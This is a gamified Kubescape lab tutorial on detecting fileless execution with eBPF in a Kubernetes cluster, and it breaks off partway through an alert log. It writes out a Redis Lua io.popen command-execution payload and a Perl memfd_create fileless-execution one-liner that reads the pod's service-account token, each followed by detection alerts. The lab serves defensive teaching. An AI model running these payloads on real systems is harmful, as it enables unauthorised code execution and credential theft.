A Lesson in the Kubescape Node-agent Dungeon

An eBPF Adventure

The Realm -- Enter the Dungeon

Welcome, adventurer. In this quest you trace a fileless execution from the moment memfd_create fires in the Linux kernel to the moment node-agent raises R1005 --- "Fileless execution detected". Along the way you meet the Fellowship and learn how eBPF-based runtime detection works.

No prior eBPF knowledge is required. If you can run kubectl and read Go, you are ready.


The Dungeon Map

You stand at the threshold of an ancient fortress buried beneath every running container. A single event --- execve("/proc/self/fd/3") --- will be your torch as you descend. By the time it emerges from the far tower, it will have been captured, translated, ordered, enriched, archived, judged, and proclaimed. This is the Dungeon of the Running Container.


The Fellowship

| Room | Guardian | Component | Repo | What They Do |
|------|----------|-----------|------|--------------|
| 1 | The Kernel | Linux kernel | - | Executes memfd_create + execve without judgment |
| 2 | Inspector Gadget | trace_exec eBPF gadget | node-agent | Captures every execve in every container |
| 3 | The Scribes | ExecOperator | node-agent | Parses raw eBPF args into Go structs |
| 4 | The Timekeeper | OrderedEventQueue | node-agent | Sorts events by nanosecond timestamp |
| 5 | The Loremaster | EventEnricher | node-agent | Builds process tree + K8s context |
| 6 | The Archivist | ProfileManager | node-agent | Records "normal" behavior during learning |
| 7 | The Vault Keeper | Storage PreSave | storage | Collapses paths via trie algorithm |
| 8 | The Inquisitor | CEL RuleManager | node-agent | Evaluates R1005 against event.exepath |
| 9 | The Herald | Exporter | node-agent | Ships alerts to stdout / AlertManager / HTTP |
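Room 7 deserves a word before we descend: profiles would balloon if every dynamically named file (session files, temp scratch paths) earned its own entry. The Vault Keeper's collapse can be sketched in a few lines; the threshold, function names, and the "⋯" marker here are illustrative assumptions, not the storage repo's real API:

```python
# Hypothetical sketch of the Vault Keeper's path collapse. The threshold and
# the "\u22ef" wildcard marker are illustrative, not the real storage code.
from collections import defaultdict

THRESHOLD = 3  # assumed: collapse once a directory holds this many entries


def collapse(paths):
    """Replace many sibling entries under one directory with a single wildcard."""
    by_dir = defaultdict(set)
    for p in paths:
        d, _, leaf = p.rpartition("/")
        by_dir[d].add(leaf)
    out = set()
    for d, leaves in by_dir.items():
        if len(leaves) >= THRESHOLD:
            out.add(d + "/\u22ef")  # one dynamic entry replaces the siblings
        else:
            out.update(d + "/" + leaf for leaf in leaves)
    return out


print(sorted(collapse(
    ["/tmp/sess-1", "/tmp/sess-2", "/tmp/sess-3", "/etc/redis.conf"]
)))  # ['/etc/redis.conf', '/tmp/⋯']
```

The payoff: a profile stays small and stable even when the workload touches ever-changing file names.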

What is eBPF? Small verified programs that run inside the kernel, observing syscalls without modifying kernel source or loading modules. The kernel's verifier guarantees safety before execution. Think of it as invisible enchantment threads woven into the kernel fabric.


Setting Up the Realm

The ApplicationProfile -- the Tome of Behavior


Step 1: Deploy Kubescape with runtime detection

Check that it is running and healthy:

kubectl get all -n kubescape

Wait for the node-agent DaemonSet, the storage Deployment, and the CRDs to be ready.

Step 2: Deploy a vulnerable Redis

Our image (ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10) is Redis 7.2.10 with plenty of unnecessary functionality and far too little hardening. We use it to mimic CVE-2022-0543, which was a packaging issue in Debian-based Redis builds. What we show you below is not a real vulnerability: the Redis Lua sandbox can often be escaped by real exploits, but those tend not to be deterministic in lab environments like this one. The point of this lab is not the exploit but the detection of fileless execution via memfd + /proc/self/fd. If you are so inclined, you can look up the actual exploit, recreate it, and detect it.

kubectl -n redis get all

Step 3: Check alerts during benign traffic

In Terminal1, run

kubectl logs -n kubescape -l app=node-agent -c node-agent -f

Node-agent builds an ApplicationProfile of "normal" behavior. In a second terminal (Terminal2), exercise the operations Redis would perform in production:

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis \
  -o jsonpath='{.items[0].metadata.name}')

kubectl -n redis exec "$REDIS_POD" -- redis-cli PING
kubectl -n redis exec "$REDIS_POD" -- redis-cli SET bobtest hello
kubectl -n redis exec "$REDIS_POD" -- redis-cli GET bobtest
kubectl -n redis exec "$REDIS_POD" -- redis-cli INFO server
kubectl -n redis exec "$REDIS_POD" -- redis-cli DBSIZE
kubectl -n redis exec "$REDIS_POD" -- redis-cli EVAL "return 'hello'" 0
kubectl -n redis exec "$REDIS_POD" -- redis-cli DEL bobtest

If you check the logs in Terminal1, there should be no alerts. This is because we previously taught the Archivist (see Room 6) that the commands above are allowed for Redis.
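Conceptually, the Archivist's verdict is a set-membership check against the learned profile. A hypothetical sketch of the idea (the field names and contents are illustrative, not node-agent's real Go types or the CRD schema):

```python
# Hypothetical sketch of an ApplicationProfile allowlist check.
# Field names and contents are illustrative, not the real schema.
profile = {
    "execs": {"/usr/local/bin/redis-server", "/usr/local/bin/redis-cli"},
    "syscalls": {"read", "write", "openat", "epoll_wait"},
}


def is_expected_exec(exec_path, profile):
    """An exec is 'expected' iff the learned profile already lists its path."""
    return exec_path in profile["execs"]


print(is_expected_exec("/usr/local/bin/redis-cli", profile))  # True: benign traffic
print(is_expected_exec("/bin/sh", profile))                   # False: would alert
```

Everything you typed in Terminal2 falls on the "expected" side of this check, which is why Terminal1 stays silent.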

Step 4: Execute the exploit

Phase 1 --- prove that alerting works. In Terminal2, run:

kubectl -n redis exec "$REDIS_POD" -- redis-cli EVAL "
local f = io.popen('id')
local res = f:read('*a')
f:close()
return 'Test ID: ' .. res
" 0

Expected (in Terminal2): Test ID: uid=999(redis) gid=999(redis) groups=999(redis)

In a current, patched Redis you would instead see Script attempted to access nonexistent global variable 'io'; the uid output above confirms that we are running the unhardened version.

Alerts (in Terminal1)

To confirm that Kubescape is installed correctly and everything is working, you should now see two "Unexpected process launched" alerts and a handful of unexpected-syscall alerts.

{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/bin/sh","-c","id"],"exec":"/bin/sh","message":"Unexpected process launched: sh with PID 111770"},"infectedPID":111770,"severity":1,"timestamp":"2026-03-01T17:12:18.988119911Z","trace":{},"uniqueID":"e02cfa37d3e36766b3d4c8757190a398","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"sh","commandLine":"/bin/sh -c id"},"file":{"name":"dash","directory":"/usr/bin"}}},"CloudMetadata":null,"RuleID":"R0001","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server","childrenMap":{"sh␟111770":{"pid":111770,"cmdline":"/bin/sh -c id","comm":"sh","ppid":99476,"pcomm":"redis-server","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/dash"}}},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected process launched: sh with PID 
111770","msg":"Unexpected process launched","processtree_depth":"2","time":"2026-03-01T17:12:19Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/usr/bin/id"],"exec":"/usr/bin/id","message":"Unexpected process launched: id with PID 111771"},"infectedPID":111771,"severity":1,"timestamp":"2026-03-01T17:12:18.989190515Z","trace":{},"uniqueID":"732769abf49bbc7bb1f0951239713b23","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"id","commandLine":"/usr/bin/id "},"file":{"name":"id","directory":"/usr/bin"}}},"CloudMetadata":null,"RuleID":"R0001","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server","childrenMap":{"sh␟111770":{"pid":111770,"cmdline":"/bin/sh -c 
id","comm":"sh","ppid":99476,"pcomm":"redis-server","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/dash","childrenMap":{"id␟111771":{"pid":111771,"cmdline":"/usr/bin/id","comm":"id","ppid":111770,"pcomm":"sh","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/id"}}}}},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected process launched: id with PID 111771","msg":"Unexpected process launched","processtree_depth":"3","time":"2026-03-01T17:12:19Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: vfork with PID 99476","syscall":"vfork"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.34440098Z","trace":{},"uniqueID":"b418b1f39648b24e8568033dbe853bdf","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: vfork with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: dup2 with PID 99476","syscall":"dup2"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.332064711Z","trace":{},"uniqueID":"52aea2a22cdf2766b3f2ca48c6494182","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: dup2 with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: wait4 with PID 99476","syscall":"wait4"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.364435324Z","trace":{},"uniqueID":"4cbc7380cdf7af107cd8c4378c3c0a63","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: wait4 with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: getgid with PID 99476","syscall":"getgid"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.405230003Z","trace":{},"uniqueID":"5ddee8ba451f8aad1b9d59403ce835b5","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: getgid with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: geteuid with PID 99476","syscall":"geteuid"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.420406502Z","trace":{},"uniqueID":"242f2128e99c30f6624b041dc55c1cd2","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: geteuid with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: getegid with PID 99476","syscall":"getegid"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.440743775Z","trace":{},"uniqueID":"4a1d64b1880c220f7ef907d344b0c973","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: getegid with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: getgroups with PID 99476","syscall":"getgroups"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.489145766Z","trace":{},"uniqueID":"00d28e48bbd818de383997313f113f9d","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: getgroups with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: getuid with PID 99476","syscall":"getuid"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.40487544Z","trace":{},"uniqueID":"a885588f25ef850dcc43fef677f8c95f","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: getuid with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}

We do not particularly care about the details here; this step simply confirms that the installation and alerting pipeline are working.

Phase 2 --- Fileless execution via memfd_create:

Now, it's time for the real threat:

kubectl -n redis exec "$REDIS_POD" -- perl -e '
use strict; use warnings;
my $name = "pwned";
my $fd = syscall(279, $name, 0);
if ($fd < 0) { $fd = syscall(319, $name, 0); }
die "memfd_create failed\n" if $fd < 0;
open(my $src, "<:raw", "/bin/cat") or die;
open(my $dst, ">&=", $fd) or die;
binmode $dst; my $buf;
while (read($src, $buf, 8192)) { print $dst $buf; }
close $src;
exec {"/proc/self/fd/$fd"} "cat",
  "/var/run/secrets/kubernetes.io/serviceaccount/token";
'

This creates an anonymous in-memory file descriptor (memfd_create), copies /bin/cat into it, then calls execve("/proc/self/fd/3") to run it. No file ever touches disk; this is exactly the pattern R1005 detects.

Alerts
{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/usr/bin/perl","-e","\nuse strict; use warnings;\nmy $name = \"pwned\";\nmy $fd = syscall(279, $name, 0);\nif ($fd \u003c 0) { $fd = syscall(319, $name, 0); }\ndie \"memfd_create failed\\n\" if $fd \u003c 0;\nopen(my $src, \"\u003c:raw\", \"/bin/cat\") or die;\nopen(my $dst, \"\u003e\u0026=\", $fd) or die;\nbinmode $ds"],"exec":"/usr/bin/perl","message":"Unexpected process launched: perl with PID 116061"},"infectedPID":116061,"severity":1,"timestamp":"2026-03-01T17:14:23.506032305Z","trace":{},"uniqueID":"452b0edfe862133c04a3660218ac80bb","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"perl","commandLine":"/usr/bin/perl -e \nuse strict; use warnings;\nmy $name = \"pwned\";\nmy $fd = syscall(279, $name, 0);\nif ($fd \u003c 0) { $fd = syscall(319, $name, 0); }\ndie \"memfd_create failed\\n\" if $fd \u003c 0;\nopen(my $src, \"\u003c:raw\", \"/bin/cat\") or die;\nopen(my $dst, \"\u003e\u0026=\", $fd) or die;\nbinmode 
$ds"},"file":{"name":"perl","directory":"/usr/bin"}}},"CloudMetadata":null,"RuleID":"R0001","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":116061,"cmdline":"/usr/bin/perl -e \nuse strict; use warnings;\nmy $name = \"pwned\";\nmy $fd = syscall(279, $name, 0);\nif ($fd \u003c 0) { $fd = syscall(319, $name, 0); }\ndie \"memfd_create failed\\n\" if $fd \u003c 0;\nopen(my $src, \"\u003c:raw\", \"/bin/cat\") or die;\nopen(my $dst, \"\u003e\u0026=\", $fd) or die;\nbinmode $ds","comm":"perl","ppid":99320,"pcomm":"runc","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/perl"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected process launched: 